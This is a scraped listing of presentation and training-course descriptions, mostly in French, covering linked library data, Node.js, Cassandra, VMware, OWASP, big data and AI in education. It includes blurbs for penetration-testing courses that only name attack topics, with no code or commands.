Linked Library Data, ou, Les bibliothèques dans le web sémantiqueNicolas Prongué
Les nouvelles technologies du web sémantique envahissent progressivement la toile, et de plus en plus de données sont maintenant disponibles en Linked Data. Les bibliothèques recueillent et saisissent leurs propres données depuis des siècles et de formidables bases de connaissances existent aujourd’hui entre leurs murs. Exploiter le web sémantique dans ce domaine peut leur offrir diverses opportunités: une gestion plus efficace des données, une présence web améliorée, une meilleure expérience utilisateur. Alors comment les bibliothèques et les usagers en profitent-ils concrètement? Quels sont les projets et les applications existants? Que font les institutions suisses?
Panorama des actions et du rôle des bibliothèques dans ce nouveau réseau d’information interconnectée.
NodeJS et SocketIO en mode scalable dans le Cloud - GAB 2015Stéphane ESCANDELL
Support de présentation utilisé pendant le Global Azure Bootcamp 2015 (GAB2015) à Lyon autour de NodeJS et SocketIO et les différentes possibilités de gestion de la scalabilité automatique dans le Cloud.
Outre le contexte particulier à Azure, le schéma présenté ici peut s'adapter à n'importe quel Cloud. D'ailleurs, la deuxième solution utilisée en production est totalement indépendante d'Azure puisque repose sur la fonctionnalité de Publisher&Subscriber
This document discusses enhancing scalability using Node.js. It describes scalability challenges and common industry solutions like horizontal and vertical scaling, which have issues like requiring load balancing and additional investments. It also discusses multi-threading and cloud computing issues like deadlocks and lack of skills. The document proposes an asynchronous, event-driven architecture using Node.js, Nginx, load balancing and a proxy server. It provides details on how this architecture allows for non-blocking I/O, high throughput and minimal latency to improve scalability over traditional solutions. A PayPal case study shows benefits of this approach.
Cassandra on Mesos Across Multiple Datacenters at Uber (Abhishek Verma) | C* ...DataStax
Traditionally, machines were statically partitioned across the different services at Uber. In an effort to increase the machine utilization, Uber has recently started transitioning most of its services, including the storage services, to run on top of Mesos. This presentation will describe the initial experience building and operating a framework for running Cassandra on top of Mesos running across multiple datacenters at Uber. This framework automates several Cassandra operations such as node repairs, addition of new nodes and backup/restore. It improves efficiency by co-locating CPU-intensive services as well as multiple Cassandra nodes on the same Mesos agent. It handles failure and restart of Mesos agents by using persistent volumes and dynamic reservations. This talk includes statistics about the number of Cassandra clusters in production, time taken to start a new cluster, add a new node, detect a node failure; and the observed Cassandra query throughput and latency.
About the Speaker
Abhishek Verma Software Engineer, Uber
Dr. Abhishek Verma is currently working on running Cassandra on top of Mesos at Uber. Prior to this, he worked on BorgMaster at Google and was the first author of the Borg paper published in Eurosys 2015. He received an MS in 2010 and a PhD in 2012 in Computer Science from the University of Illinois at Urbana-Champaign, during which he authored more than 20 publications in conferences, journals and books and presented tens of talks.
Alphorm.com Support de la Formation VMware vSphere 6, Les machines virtuellesAlphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-vmware-vsphere-6-les-machines-virtuelles
La virtualisation s'est imposée comme une solution permettant de sécuriser le fonctionnement des environnements informatiques et d'en rationaliser la gestion.
VMware propose dorénavant la version 6 de vSphere, porteuse de près de 650 nouvelles fonctionnalités et innovations.
Après avoir acquis les connaissances de base de la virtualisation avec la formation VMware vSphere 5, la formation VMware ESXi 6, et la formation VMware vCenter 6, votre vExpert Fouad EL AKKAD vous a préparé cette nouvelle formation VMware vSphere 6, Les machines virtuelles.
Grâce à cette formation VMware vSphere 6, Les machines virtuelles, celles-ci n'auront plus de secret pour vous.
Pendant cette formation VMware vSphere 6, Les machines virtuelles, vous découvrirez tous les modes de déploiements d'une VM, le paramétrage avancé et la gestion de performance.
Au cours de cette formation VMware vSphere 6, Les machines virtuelles, vous apprendrez à installer, configurer et administrer les composants d'une infrastructure virtuelle VMware vSphere 6. Gérer le réseau virtuel, le stockage, les ressources et le déploiement des machines. Sécuriser et sauvegarder l'infrastructure mise en place.
Au bout de cette formation VMware vSphere 6, Les machines virtuelles, vous aurez les armes vous permettant de troubleshooter une VM, mais aussi de pouvoir convaincre via des métriques de performance claires, vos interlocuteurs sur le bon Sizing VM.
Cette formation VMware vSphere 6, Les machines virtuelles explorera tous les points nécessaires à l'expertise et la bonne gestion des machines virtuelles.
Linked Library Data, ou, Les bibliothèques dans le web sémantiqueNicolas Prongué
Les nouvelles technologies du web sémantique envahissent progressivement la toile, et de plus en plus de données sont maintenant disponibles en Linked Data. Les bibliothèques recueillent et saisissent leurs propres données depuis des siècles et de formidables bases de connaissances existent aujourd’hui entre leurs murs. Exploiter le web sémantique dans ce domaine peut leur offrir diverses opportunités: une gestion plus efficace des données, une présence web améliorée, une meilleure expérience utilisateur. Alors comment les bibliothèques et les usagers en profitent-ils concrètement? Quels sont les projets et les applications existants? Que font les institutions suisses?
Panorama des actions et du rôle des bibliothèques dans ce nouveau réseau d’information interconnectée.
NodeJS et SocketIO en mode scalable dans le Cloud - GAB 2015Stéphane ESCANDELL
Support de présentation utilisé pendant le Global Azure Bootcamp 2015 (GAB2015) à Lyon autour de NodeJS et SocketIO et les différentes possibilités de gestion de la scalabilité automatique dans le Cloud.
Outre le contexte particulier à Azure, le schéma présenté ici peut s'adapter à n'importe quel Cloud. D'ailleurs, la deuxième solution utilisée en production est totalement indépendante d'Azure puisque repose sur la fonctionnalité de Publisher&Subscriber
This document discusses enhancing scalability using Node.js. It describes scalability challenges and common industry solutions like horizontal and vertical scaling, which have issues like requiring load balancing and additional investments. It also discusses multi-threading and cloud computing issues like deadlocks and lack of skills. The document proposes an asynchronous, event-driven architecture using Node.js, Nginx, load balancing and a proxy server. It provides details on how this architecture allows for non-blocking I/O, high throughput and minimal latency to improve scalability over traditional solutions. A PayPal case study shows benefits of this approach.
Cassandra on Mesos Across Multiple Datacenters at Uber (Abhishek Verma) | C* ...DataStax
Traditionally, machines were statically partitioned across the different services at Uber. In an effort to increase the machine utilization, Uber has recently started transitioning most of its services, including the storage services, to run on top of Mesos. This presentation will describe the initial experience building and operating a framework for running Cassandra on top of Mesos running across multiple datacenters at Uber. This framework automates several Cassandra operations such as node repairs, addition of new nodes and backup/restore. It improves efficiency by co-locating CPU-intensive services as well as multiple Cassandra nodes on the same Mesos agent. It handles failure and restart of Mesos agents by using persistent volumes and dynamic reservations. This talk includes statistics about the number of Cassandra clusters in production, time taken to start a new cluster, add a new node, detect a node failure; and the observed Cassandra query throughput and latency.
About the Speaker
Abhishek Verma Software Engineer, Uber
Dr. Abhishek Verma is currently working on running Cassandra on top of Mesos at Uber. Prior to this, he worked on BorgMaster at Google and was the first author of the Borg paper published in Eurosys 2015. He received an MS in 2010 and a PhD in 2012 in Computer Science from the University of Illinois at Urbana-Champaign, during which he authored more than 20 publications in conferences, journals and books and presented tens of talks.
Alphorm.com Support de la Formation VMware vSphere 6, Les machines virtuellesAlphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-vmware-vsphere-6-les-machines-virtuelles
La virtualisation s'est imposée comme une solution permettant de sécuriser le fonctionnement des environnements informatiques et d'en rationaliser la gestion.
VMware propose dorénavant la version 6 de vSphere, porteuse de près de 650 nouvelles fonctionnalités et innovations.
Après avoir acquis les connaissances de base de la virtualisation avec la formation VMware vSphere 5, la formation VMware ESXi 6, et la formation VMware vCenter 6, votre vExpert Fouad EL AKKAD vous a préparé cette nouvelle formation VMware vSphere 6, Les machines virtuelles.
Grâce à cette formation VMware vSphere 6, Les machines virtuelles, celles-ci n'auront plus de secret pour vous.
Pendant cette formation VMware vSphere 6, Les machines virtuelles, vous découvrirez tous les modes de déploiements d'une VM, le paramétrage avancé et la gestion de performance.
Au cours de cette formation VMware vSphere 6, Les machines virtuelles, vous apprendrez à installer, configurer et administrer les composants d'une infrastructure virtuelle VMware vSphere 6. Gérer le réseau virtuel, le stockage, les ressources et le déploiement des machines. Sécuriser et sauvegarder l'infrastructure mise en place.
Au bout de cette formation VMware vSphere 6, Les machines virtuelles, vous aurez les armes vous permettant de troubleshooter une VM, mais aussi de pouvoir convaincre via des métriques de performance claires, vos interlocuteurs sur le bon Sizing VM.
Cette formation VMware vSphere 6, Les machines virtuelles explorera tous les points nécessaires à l'expertise et la bonne gestion des machines virtuelles.
Alphorm.com Support de la Formation VMware vSphere 6 - Clustering HA, DRS et ...Alphorm
Formation complète ici:
http://www.alphorm.com/tutoriel/formation-en-ligne-vmware-vsphere-6-clustering-ha-drs-et-sdrs
Votre vExpert Fouad EL AKKAD continue toujours avec le produit vSphere 6, après avoir étudié, expliqué mis en place un environnement complet de virtualisation vSphere 6. Nous pouvons à la suite de cette série complète vSphere 6, poser LES fonctionnalités avancées et libérer toute la puissance d'un cluster ESXi.
La haute disponibilité, l'éradication des SPOF "Single Point Of Fail" sont les enjeux premiers des services informatique, afin de répondre au mieux aux besoins métiers. Cette formation vous donnera toutes les clefs pour mettre en place une infrastructure de qualité et de haute disponibilité
A la suite de cette formation, les interruptions de services de votre infrastructures ne seront que de mauvais souvenirs.
Alphorm.com Support de la formation Vmware Esxi 6.0Alphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-vmware-esxi-6
L'hyperviseur VMware ESXi 6 est la solution GRATUITE de virtualisation des serveurs la plus aboutie et répandue dans le monde de la virtualisation. Avec VMware ESXi 6 vous pouvez ainsi consolider vos applications sur moins de matériel.
Cette formation VMware ESXi 6 vous donnera toutes les clefs afin d'obtenir des bases solides sur l'installation et la gestion d'un Hyperviseur VMware ESXi 6. Mais aussi sur sa mise en place dans le monde complexe et hétérogène du DataCenter.
Durant cette formation VMware ESXi 6, votre formateur vExpert Fouad EL AKKAD, vous montrera comment installer et configurer un VMware ESXi 6, créer, installer et configurer des machines virtuelles, installer des VMware tools, configurer la délégation et sécuriser votre hyperviseur VMware ESXi 6, et enfin mettre à jour et à niveau vos serveurs VMware ESXi 6.
Après cette formation, VMware ESXi 6 n’aura plus de secret pour vous.
D’autres formations sur VMware vSphere 6, vCenter 6, Update Manager 6 sont en cours de réalisation.
Bienvenue dans le monde de la virtualisation des serveurs sous formation VMware ESXi 6.
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-expert-metasploit
Après les trois formations, formation Hacking et Sécurité, l'essentiel , formation Hacking & Sécurité, Avancé et formation Hacking et Sécurité Expert - Réseaux sans fils, votre MVP Hamza KONDAH, revient avec cette nouvelle formation Hacking et Sécurité, dédiée entièrement à la maitrise de l’indispensable Metasploit.
Cette formation Hacking et Sécurité, Metasploit englobe une analyse et compréhension des différents éléments composants de Metasploit pour une exploitation efficace ainsi qu’une structuration des connaissances avant de passer aux attaques qui sont axées pratiques à 100 %.
Cette formation Hacking et Sécurité, Metasploit vise à vous donner la capacité d’effectuer des tests de pénétration en exploitant au maximum ce framework extrêmement puissant.
A la suite de cette formation Hacking et Sécurité, Metasploit, vous serez capable de bien comprendre les différents composants de Metasploit, pouvoir effectuer des tests de pénétration complets en exploitant la puissance de ce Framework, coder des modules, coder des scripts post exploitation, comprendre la notion de développement d’exploit, le débogage et le fuzzing, effectuer des attaques avancées et bien d’autres surprises.
Après cette formation Hacking et Sécurité, Metasploit, suivra la formation Hacking et Sécurité, Vulnérabilités Web qui est déjà en cours de réalisation.
Alphorm.com Formation Hacking et Sécurité , avancéAlphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-avance
Cette formation Hacking & Sécurité, Avancé est une approche avancée des pratiques et des méthodologies utilisées par les hackers dans le cadre d’intrusion dans des réseaux et des applications. C’est la suite de la première formation l’essentiel du Hacking & Sécurité.
Durant cette formation Hacking & Sécurité, Avancé nous mettons l’accent sur la compréhension technique et pratique des différentes formes d’attaques existantes, en se tardant sur les vulnérabilités les plus critiques : Social engineering, Dénis de service, le Fuzzing, les Botnets, Attaques Server-Side, Le Brute Force, Le cracking de mot de passe, Attaques Client-Side, MiTM Proxy, Elévation de privilège, Attaques Web, Attaques sur les réseaux sans fils, Bypassing HSSI, Bypassing MAC adress Authentication, Attaque WEP, Attaque WPA et WPA2, Clonage de points d'accès, L'attaque DoS.
A la fin de cette formation Hacking & Sécurité, Avancé vous serez capable de réaliser des audits de sécurité (test de pénétration) avancés au sein d’une infrastructure, tester la sécurité des réseaux sans fils ainsi que préparer un rapport sur vos activités avec des outils professionnels dédiés.
Comme dans la formation l’essentiel du Hacking & Sécurité cette formation Hacking & Sécurité, Avancé sera axée sur un lab détaillé et complet pour mettre toutes les techniques en pratiques.
Aussi vous pouvez télécharger pleines de ressources et outils en annexe de cette formation.
Fondo de Control Social Ciudadanos al Cuidado de lo Público.Nodo Centro Orien...TransparenciaporColombia
Fondo de Control Social Ciudadanos al Cuidado de lo Público
Presentación de las organizaciones sociales que lideran los ejercicios de control social en el Nodo Centro Occidente:
Asociación de Juntas de Acción Comunal del corregimiento de San Bernardo de Bata - Municipio de Toledo
Asociación de Juntas de Acción Comunal de la Comuna 6- Cúcuta
Asociación de Mujer Rural Pamplonita- ASOMURPITA
Socio regional: Parcomún
Este documento describe los principios fundamentales de la metodología cualitativa. Explica que este enfoque estudia los fenómenos de una manera integral y sistémica, teniendo en cuenta múltiples perspectivas. Rechaza el modelo positivista de investigación aislada y en su lugar fomenta un proceso dinámico y flexible guiado por el área problemática en lugar de hipótesis preconcebidas. El objetivo general es comprender la naturaleza profunda de la realidad estudiando las cualidades y características distintivas en su contexto
Presentación de Dany Oviedo, de la Fundación Protransparencia, durante el Foro Transparencia para el Desarrollo Local en las Américas, realizado en Cartagena de Indias, Colombia el 13 de junio de 2013 como parte de la conmemoración de los 15 años de Transparencia por Colombia.
La veille de Né Kid du 071211 : Le téléphone mobile en AfriqueNé Kid
Cette semaine, dans la veille de Né Kid :
L’actu mise à nu :
• Le grand ménage des allégations
• La guerre de l’attention frappe
• Quoi de neuf du côté des digital natives?
Point de vue : le mobile en Afrique
Tendances et innovations :
• Norte photoblocker
• Boobstagram
• Staround
Direction Ressources Humaines à temps partagéAtlays
Toute entreprise doit rapidement faire face durant son développement à des enjeux humains forts. Atlays prend en charge votre direction RH de quelques jours par mois à quelques jours par semaine et vous permet ainsi d’adresser pour un coût raisonnable les principaux domaines de la gestion de votre capital humain : recrutement, formation, fidélisation, politique salariale.
El documento describe una unidad académica sobre la estructura del computador que utilizará una modalidad de aprendizaje híbrido. Los estudiantes verán un video en el aula virtual que muestra los componentes internos de un computador y sus funciones, y luego generarán un diagrama mostrando estos componentes. Finalmente, en la clase presencial los estudiantes identificarán la estructura interna de un computador real y ensamblarán uno.
Este documento proporciona instrucciones para agregar una base de datos en Visual Basic. Explica cómo crear una base de datos en Access, generar tablas como "Ventas" con campos como "No. Venta", "Cliente", "Fecha" y "Total a pagar", y crear consultas como "CCliente". También muestra cómo conectar los controles de formulario a los campos de la tabla, programar botones como "Limpiar" y "Registrar Pedido", y generar un ejecutable del proyecto completo.
La veille de né kid du 15.09.2010 : le folklore du webNé Kid
Au sommaire de ce numéro 146 de la veille de Né Kid :
Actus :
• Les faux avis sur internet
• Google Instant réinvente le search
• La revanche des marques nationales ?
Point de vue spéciale auto-promo : Les folklores du Web
Idées, tendances & innovations :
• Chaleur humaine
• Interface du futur
• Dance avec les morts
OWASP Top Ten 2007 - Sommaire executif - French versionspl0it
Presentation faite au chapitre OWASP Montreal, le 24 fevrier 2009. Sommaire executif, visuel et haut niveau. Permet de comprendre visuellement le Top Ten avec des exemples concrets, pour attirer l'interet des gestionnaires d'entreprise sur l'importance de la securite applicative.
Node.js et les nouvelles technologies javascriptKhalid Jebbari
Présentation sur Node.js et les nouvelles technologies javascript, qui a eu lieu dans les locaux de Smile, à Levallois (92).
Retour d'exploration par un développeur Drupal (moi) sur ces technologies, et comparaison avec Drupal.
Alphorm.com Support de la Formation VMware vSphere 6 - Clustering HA, DRS et ...Alphorm
Formation complète ici:
http://www.alphorm.com/tutoriel/formation-en-ligne-vmware-vsphere-6-clustering-ha-drs-et-sdrs
Votre vExpert Fouad EL AKKAD continue toujours avec le produit vSphere 6, après avoir étudié, expliqué mis en place un environnement complet de virtualisation vSphere 6. Nous pouvons à la suite de cette série complète vSphere 6, poser LES fonctionnalités avancées et libérer toute la puissance d'un cluster ESXi.
La haute disponibilité, l'éradication des SPOF "Single Point Of Fail" sont les enjeux premiers des services informatique, afin de répondre au mieux aux besoins métiers. Cette formation vous donnera toutes les clefs pour mettre en place une infrastructure de qualité et de haute disponibilité
A la suite de cette formation, les interruptions de services de votre infrastructures ne seront que de mauvais souvenirs.
Alphorm.com Support de la formation Vmware Esxi 6.0Alphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-vmware-esxi-6
L'hyperviseur VMware ESXi 6 est la solution GRATUITE de virtualisation des serveurs la plus aboutie et répandue dans le monde de la virtualisation. Avec VMware ESXi 6 vous pouvez ainsi consolider vos applications sur moins de matériel.
Cette formation VMware ESXi 6 vous donnera toutes les clefs afin d'obtenir des bases solides sur l'installation et la gestion d'un Hyperviseur VMware ESXi 6. Mais aussi sur sa mise en place dans le monde complexe et hétérogène du DataCenter.
Durant cette formation VMware ESXi 6, votre formateur vExpert Fouad EL AKKAD, vous montrera comment installer et configurer un VMware ESXi 6, créer, installer et configurer des machines virtuelles, installer des VMware tools, configurer la délégation et sécuriser votre hyperviseur VMware ESXi 6, et enfin mettre à jour et à niveau vos serveurs VMware ESXi 6.
Après cette formation, VMware ESXi 6 n’aura plus de secret pour vous.
D’autres formations sur VMware vSphere 6, vCenter 6, Update Manager 6 sont en cours de réalisation.
Bienvenue dans le monde de la virtualisation des serveurs sous formation VMware ESXi 6.
Alphorm.com Support de la formation Hacking et Sécurité MetasploitAlphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-expert-metasploit
Après les trois formations, formation Hacking et Sécurité, l'essentiel , formation Hacking & Sécurité, Avancé et formation Hacking et Sécurité Expert - Réseaux sans fils, votre MVP Hamza KONDAH, revient avec cette nouvelle formation Hacking et Sécurité, dédiée entièrement à la maitrise de l’indispensable Metasploit.
Cette formation Hacking et Sécurité, Metasploit englobe une analyse et compréhension des différents éléments composants de Metasploit pour une exploitation efficace ainsi qu’une structuration des connaissances avant de passer aux attaques qui sont axées pratiques à 100 %.
Cette formation Hacking et Sécurité, Metasploit vise à vous donner la capacité d’effectuer des tests de pénétration en exploitant au maximum ce framework extrêmement puissant.
A la suite de cette formation Hacking et Sécurité, Metasploit, vous serez capable de bien comprendre les différents composants de Metasploit, pouvoir effectuer des tests de pénétration complets en exploitant la puissance de ce Framework, coder des modules, coder des scripts post exploitation, comprendre la notion de développement d’exploit, le débogage et le fuzzing, effectuer des attaques avancées et bien d’autres surprises.
Après cette formation Hacking et Sécurité, Metasploit, suivra la formation Hacking et Sécurité, Vulnérabilités Web qui est déjà en cours de réalisation.
Alphorm.com Formation Hacking et Sécurité , avancéAlphorm
Formation complète ici :
http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-avance
Cette formation Hacking & Sécurité, Avancé est une approche avancée des pratiques et des méthodologies utilisées par les hackers dans le cadre d’intrusion dans des réseaux et des applications. C’est la suite de la première formation l’essentiel du Hacking & Sécurité.
Durant cette formation Hacking & Sécurité, Avancé nous mettons l’accent sur la compréhension technique et pratique des différentes formes d’attaques existantes, en se tardant sur les vulnérabilités les plus critiques : Social engineering, Dénis de service, le Fuzzing, les Botnets, Attaques Server-Side, Le Brute Force, Le cracking de mot de passe, Attaques Client-Side, MiTM Proxy, Elévation de privilège, Attaques Web, Attaques sur les réseaux sans fils, Bypassing HSSI, Bypassing MAC adress Authentication, Attaque WEP, Attaque WPA et WPA2, Clonage de points d'accès, L'attaque DoS.
A la fin de cette formation Hacking & Sécurité, Avancé vous serez capable de réaliser des audits de sécurité (test de pénétration) avancés au sein d’une infrastructure, tester la sécurité des réseaux sans fils ainsi que préparer un rapport sur vos activités avec des outils professionnels dédiés.
Comme dans la formation l’essentiel du Hacking & Sécurité cette formation Hacking & Sécurité, Avancé sera axée sur un lab détaillé et complet pour mettre toutes les techniques en pratiques.
Aussi vous pouvez télécharger pleines de ressources et outils en annexe de cette formation.
Fondo de Control Social Ciudadanos al Cuidado de lo Público.Nodo Centro Orien...TransparenciaporColombia
Fondo de Control Social Ciudadanos al Cuidado de lo Público
Presentación de las organizaciones sociales que lideran los ejercicios de control social en el Nodo Centro Occidente:
Asociación de Juntas de Acción Comunal del corregimiento de San Bernardo de Bata - Municipio de Toledo
Asociación de Juntas de Acción Comunal de la Comuna 6- Cúcuta
Asociación de Mujer Rural Pamplonita- ASOMURPITA
Socio regional: Parcomún
Este documento describe los principios fundamentales de la metodología cualitativa. Explica que este enfoque estudia los fenómenos de una manera integral y sistémica, teniendo en cuenta múltiples perspectivas. Rechaza el modelo positivista de investigación aislada y en su lugar fomenta un proceso dinámico y flexible guiado por el área problemática en lugar de hipótesis preconcebidas. El objetivo general es comprender la naturaleza profunda de la realidad estudiando las cualidades y características distintivas en su contexto
Presentación de Dany Oviedo, de la Fundación Protransparencia, durante el Foro Transparencia para el Desarrollo Local en las Américas, realizado en Cartagena de Indias, Colombia el 13 de junio de 2013 como parte de la conmemoración de los 15 años de Transparencia por Colombia.
La veille de Né Kid du 071211 : Le téléphone mobile en AfriqueNé Kid
Cette semaine, dans la veille de Né Kid :
L’actu mise à nu :
• Le grand ménage des allégations
• La guerre de l’attention frappe
• Quoi de neuf du côté des digital natives?
Point de vue : le mobile en Afrique
Tendances et innovations :
• Norte photoblocker
• Boobstagram
• Staround
Direction Ressources Humaines à temps partagéAtlays
Toute entreprise doit rapidement faire face durant son développement à des enjeux humains forts. Atlays prend en charge votre direction RH de quelques jours par mois à quelques jours par semaine et vous permet ainsi d’adresser pour un coût raisonnable les principaux domaines de la gestion de votre capital humain : recrutement, formation, fidélisation, politique salariale.
El documento describe una unidad académica sobre la estructura del computador que utilizará una modalidad de aprendizaje híbrido. Los estudiantes verán un video en el aula virtual que muestra los componentes internos de un computador y sus funciones, y luego generarán un diagrama mostrando estos componentes. Finalmente, en la clase presencial los estudiantes identificarán la estructura interna de un computador real y ensamblarán uno.
Este documento proporciona instrucciones para agregar una base de datos en Visual Basic. Explica cómo crear una base de datos en Access, generar tablas como "Ventas" con campos como "No. Venta", "Cliente", "Fecha" y "Total a pagar", y crear consultas como "CCliente". También muestra cómo conectar los controles de formulario a los campos de la tabla, programar botones como "Limpiar" y "Registrar Pedido", y generar un ejecutable del proyecto completo.
La veille de né kid du 15.09.2010 : le folklore du webNé Kid
Au sommaire de ce numéro 146 de la veille de Né Kid :
Actus :
• Les faux avis sur internet
• Google Instant réinvente le search
• La revanche des marques nationales ?
Point de vue spéciale auto-promo : Les folklores du Web
Idées, tendances & innovations :
• Chaleur humaine
• Interface du futur
• Dance avec les morts
OWASP Top Ten 2007 - Sommaire executif - French versionspl0it
Presentation faite au chapitre OWASP Montreal, le 24 fevrier 2009. Sommaire executif, visuel et haut niveau. Permet de comprendre visuellement le Top Ten avec des exemples concrets, pour attirer l'interet des gestionnaires d'entreprise sur l'importance de la securite applicative.
Node.js et les nouvelles technologies javascriptKhalid Jebbari
Présentation sur Node.js et les nouvelles technologies javascript, qui a eu lieu dans les locaux de Smile, à Levallois (92).
Retour d'exploration par un développeur Drupal (moi) sur ces technologies, et comparaison avec Drupal.
Cours de 1h30 pour HETIC - H4.
Architecture Web.
Présentation générale de l'architecture web, bons et mauvais exemples.
Présentation des load balancers & proxys
Présentation des caches (memcached, varnish...)
Cloud
Introduction aux Technologies Web élaborée par Marouan OMEZZINEMarouan OMEZZINE
Une introduction / ébauche aux technologies Web (Web, évolution, web 2.0, php, ajax...) faite dans le cadre des formations inter-membres du club Junior ENSI (http://www.junior-ensi.org/) de l'école nationale des sciences de l'informatique (http://www.ensi.rnu.tn/).
Ce support explique les concepts de base de Big Data Processing. Elle aborde les parties suivantes :
Série de vidéos : https://www.youtube.com/watch?v=1JAljjxpm-Q
- Introduction au Big Data
- Système de stockage en Big Data
- Batch Processing et Stream Processing en Big Data
- Aperçu bref de l’écosystème de Hadoop
- Aperçu de l’écosystème des outils du Bid Gata
- Big data stream processing avec Kafka écosystème
- Architecture de Kafka (Brokers, Zookeeper, Procuder, Consumer, Kafka Streams, Connecteurs)
- Comment démarrer un cluster de brokers KAFKA
- Création et configuration des Topics
- Création d’un Java Kafka consumer
- Création d’un Java Kafka Produder
- Kafka Producer et Kafka Consumer dans une application basée sur Spring
- Kafka Streams
- Intégration de Kafka dans Spring Cloud.
Mot clés : Big data, Big Data Processing, Stream Processing, Kafka, Kafka Streams, Java, Spring
Bon apprentissage
Nouveau look pour une nouvelle vie : HTML5, Spring, NoSQL et mobilitéJulien Dubois
Présentation donnée lors de Devoxx France 2012, présentant comment réaliser une application moderne avec les technologies HTML5, Spring, NoSQL (Cassandra) et mobiles.
Nouveau look pour une nouvelle vie : HTML5, Spring, NoSQL et MobileIppon
Présentation donnée par Julien Dubois lors de Devoxx France 2012, présentant comment réaliser une application moderne avec les technologies HTML5, Spring, NoSQL (Cassandra) et mobiles.
Introduction au web des données (Linked Data)BorderCloud
L'Open Data, le Big Data, le Web des données, le Web sémantique, les ontologies, le NoSql et le SPARQL sont autant de notions qu'il faut comprendre pour ne pas rater la prochaine rupture technologique du Web.
Cette présentation est l'introduction de la formation sur le Web sémantique que donne la société BorderCloud pour prendre un peu de recule sur les buzzwords du moment et savoir si vous avez besoin de faire du Big Data ou bien du Linked Data.
Présentation des derniers résultats de la tortue IPv6. Cette version est en Français. Les résultats sont les mêmes que ceux présentés lors du Webinar IPv6 ISOC du 6 Juin 2012, du même auteur.
Date des résultats - 4 Juin 2012, c'est à dire 2 jours avant le "World IPv6 Launch".
Cette présentation a été faite lors du colloque de Déploiement IPv6 en Tunisie, le 19 Juin 2012. Ce colloque a été mis en place par la Fédération Méditerranéenne des Associations d'Internet (FMAI).
http://www.fmai.org/
OWASP Top10 IoT - CLUSIR Infornord Décembre 2014Sébastien GIORIA
The document discusses OWASP (Open Web Application Security Project) and its mission to secure applications. It introduces the OWASP IoT Top 10 risks, which identifies the most critical security risks in Internet of Things environments. The top risks include insecure web interfaces, authentication and authorization issues, lack of transport encryption, and privacy concerns. The presentation provides an overview of each risk and recommends solutions and tools to help address the vulnerabilities.
Analyser la sécurité de son code source avec SonarSourceSébastien GIORIA
Présentation dans le cadre de l'Application Security Forum de Yverdon 2014.
La présentaiton indique comment se service de Sonar pour effectuer des analyses sécurité. Et présente aussi le projet OWASP SonarQube
This document summarizes a presentation given by Sébastien Gioria on application security. The presentation provided an overview of the current state of application security, described the Open Web Application Security Project (OWASP) including its mission and resources, and highlighted several OWASP projects that developers can use to help secure applications. It also listed upcoming security events in France and ways to support OWASP.
This document provides an introduction to secure coding for Java applications presented by Sebastien Gioria to the Java User Group in Poitou-Charentes, France. The presentation covers the importance of application security, current state and goals, using OWASP materials to secure code, and secure coding principles. It highlights statistics on application vulnerabilities from Verizon and WhiteHat Security reports and addresses common misconceptions about application security.
The document provides an overview of OWASP (Open Web Application Security Project) and application security. It discusses that most websites are vulnerable to attacks given the digital environment we live in. It then introduces OWASP as a non-profit focused on application security that produces many free, open resources like the OWASP Top 10 list of risks and over 200 projects. The presentation highlights some of OWASP's major projects and resources and emphasizes that application security is important as the "Age of Application Security".
The document discusses a training day presentation on integrating security and privacy in web application projects given by Sebastien Gioria. It covers using OWASP materials to secure code, secure coding principles, and code reviews. It also provides information on OWASP publications that can be used like the Top 10, Building Security In, and Code Review Guide.
Le Comptoir OCTO - Qu’apporte l’analyse de cycle de vie lors d’un audit d’éco...OCTO Technology
Par Nicolas Bordier (Consultant numérique responsable @OCTO Technology) et Alaric Rougnon-Glasson (Sustainable Tech Consultant @OCTO Technology)
Sur un exemple très concret d’audit d’éco-conception de l’outil de bilan carbone C’Bilan développé par ICDC (Caisse des dépôts et consignations) nous allons expliquer en quoi l’ACV (analyse de cycle de vie) a été déterminante pour identifier les pistes d’actions pour réduire jusqu'à 82% de l’empreinte environnementale du service.
Vidéo Youtube : https://www.youtube.com/watch?v=7R8oL2P_DkU
Compte-rendu :
L'IA connaît une croissance rapide et son intégration dans le domaine éducatif soulève de nombreuses questions. Aujourd'hui, nous explorerons comment les étudiants utilisent l'IA, les perceptions des enseignants à ce sujet, et les mesures possibles pour encadrer ces usages.
Constat Actuel
L'IA est de plus en plus présente dans notre quotidien, y compris dans l'éducation. Certaines universités, comme Science Po en janvier 2023, ont interdit l'utilisation de l'IA, tandis que d'autres, comme l'Université de Prague, la considèrent comme du plagiat. Cette diversité de positions souligne la nécessité urgente d'une réponse institutionnelle pour encadrer ces usages et prévenir les risques de triche et de plagiat.
Enquête Nationale
Pour mieux comprendre ces dynamiques, une enquête nationale intitulée "L'IA dans l'enseignement" a été réalisée. Les auteurs de cette enquête sont Le Sphynx (sondage) et Compilatio (fraude académique). Elle a été diffusée dans les universités de Lyon et d'Aix-Marseille entre le 21 juin et le 15 août 2023, touchant 1242 enseignants et 4443 étudiants. Les questionnaires, conçus pour étudier les usages de l'IA et les représentations de ces usages, abordaient des thèmes comme les craintes, les opportunités et l'acceptabilité.
Résultats de l'Enquête
Les résultats montrent que 55 % des étudiants utilisent l'IA de manière occasionnelle ou fréquente, contre 34 % des enseignants. Cependant, 88 % des enseignants pensent que leurs étudiants utilisent l'IA, ce qui pourrait indiquer une surestimation des usages. Les usages identifiés incluent la recherche d'informations et la rédaction de textes, bien que ces réponses ne puissent pas être cumulées dans les choix proposés.
Analyse Critique
Une analyse plus approfondie révèle que les enseignants peinent à percevoir les bénéfices de l'IA pour l'apprentissage, contrairement aux étudiants. La question de savoir si l'IA améliore les notes sans développer les compétences reste débattue. Est-ce un dopage académique ou une opportunité pour un apprentissage plus efficace ?
Acceptabilité et Éthique
